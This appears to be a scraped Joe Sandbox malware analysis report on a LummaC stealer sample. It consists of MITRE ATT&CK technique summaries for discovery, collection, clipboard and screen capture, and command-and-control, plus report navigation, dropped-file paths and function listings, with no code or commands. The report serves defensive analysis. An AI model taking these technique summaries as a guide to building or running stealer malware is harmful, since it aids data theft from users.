Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report J18zxRjOes.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_628E.tmp.exe_1cf21654aa664fdb1444134b36dc15e4893d_4e22d986_e03f3903-18a6-4984-8246-cf4e6fb6e691\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6ABC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BB7.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BE7.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\628E.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
J18zxRjOes.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0063003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre